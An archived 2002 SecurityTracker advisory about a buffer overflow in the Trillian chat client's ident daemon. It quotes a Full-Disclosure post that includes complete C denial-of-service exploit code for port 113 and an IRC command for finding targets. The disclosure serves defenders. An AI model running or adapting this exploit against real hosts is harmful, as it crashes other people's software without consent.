SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Instant Messaging/IRC/Chat)  >   Trillian Vendors:   Cerulean Studios
Trillian Chat Client Buffer Overflow in 'ident' Daemon Lets Remote Users Crash the Client
SecurityTracker Alert ID:  1005236
SecurityTracker URL:  http://securitytracker.com/id/1005236
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 17 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): .74 and prior versions
Description:   A buffer overflow was reported in the 'ident' component of the Trillian chat client. A remote user can cause the client to crash.

It is reported that a remote user can connect to the ident port (113) and send 418 bytes to cause Trillian to crash (if the ident feature is enabled). The author of the report indicates that the ability to execute arbitrary code is not known at this time.
Impact:   A remote user can cause the Trillian client to crash.
Solution:   No solution was available at the time of this entry.

The author of the report recommends disabling the Trillian identd and using a 3rd party identd daemon if required.
Vendor URL:  www.ceruleanstudios.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Version 1.0 is Also Affected) Re: Trillian Chat Client Buffer Overflow in 'ident' Daemon Lets Remote Users Crash the Client   (Jose Nazario <jose@monkey.org>)
A user reports that version '1.0 Pro' is also vulnerable.


 Source Message Contents
Date:  Tue, 17 Sep 2002 06:29:33 +0000
Subject:  [Full-Disclosure] Trillian .74 and below, ident flaw.


Discovered:
-----------
03 September 2002 By Me, Lance Fitz-Herbert (aka phrizer).


Vulnerable Applications:
------------------------
Tested On Trillian .74 and .73, But im guessing older versions are also 
vulnerable.


Impact:
-------
Low-High. This could allow arbitary code to be executed on the remote 
victims machine, or simply used as a DoS.

Its not yet known whether this can actually be used to execute code on the 
machine however, if someone finds out, please let us know. :D

Details:
--------
Trillian is a popular Instant Messageing client, which supports 
icq/aim/yahoo/msn and IRC.
In order to connect to some IRC networks the user has to have an Identd 
running. Trillian incorperates an ident daemon in the client, which is 
susceptible to an overflow attack if enabled.

Connecting To the ident (on port 113) and sending 418 bytes will cause 
trillian to crash.
It should be noted that trillian leaves the ident port open throughout the 
IRC session, an attacker would just have
to connect to an IRC server and perform a '/who +u *tril*' and he/she would 
be greeted with a list of users running trillian.


Solution:
---------
Disable Trillians Identd, and install a third party one if necessary.


DoS Example Exploit Code Follows:
---------------------------------

/* Trillian-Ident.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Ident Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5
   This Example Will Just DoS The Trillian Client.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
char payload[500];
int main(int argc, char * argv[]) {
	int iret;
	struct hostent *host;
	SOCKET sockhandle;
	SOCKADDR_IN address;
	WSADATA wsdata;

	if (argc<2) {
		printf("\nTrillian Ident DoS\n");
		printf("----------------------\n");
		printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
		printf("Tested On Version .74 and .73\n\n");
		printf("Usage: trillian-ident <address>");
		return 0;
	}

	WSAStartup(MAKEWORD(1,1),&wsdata);
	printf("Making Socket Now...\n");
	sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

	if (sockhandle == SOCKET_ERROR) {
		printf("Error Creating Socket\n");
		WSACleanup();
		return 1;
	}

	printf("Socket Created\n");

	address.sin_family = AF_INET;
	address.sin_port = htons(113);
	address.sin_addr.s_addr = inet_addr(argv[1]);


	if (address.sin_addr.s_addr == INADDR_NONE) {
		host = NULL;
		printf("Trying To Resolve Host\n");
		host = gethostbyname(argv[1]);
		if (host == NULL) {
			printf("Uknown Host: %s\n",argv[1]);
			WSACleanup();
			return 1;
		}
		memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);
	}



	printf("Connecting To Server...\n");
	iret = connect(sockhandle, (struct sockaddr *) &address,	sizeof(address));

	if (iret == SOCKET_ERROR) {
		printf("Couldnt Connect\n");
		WSACleanup();
		return 1;
	}

	printf("Connected to %s!\nSending Payload\n",argv[1]);
	memset(payload,'A',500);
	send(sockhandle,payload,strlen(payload),0);
	Sleep(100);
	WSACleanup();
	return 0;
}


-- end code --

----
NOTE: Because of the amount of spam i receive, i require all emails directed 
*to me* to contain the word "nospam" in the subject line somewhere. Else i 
might not get your email. thankyou.
----








_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC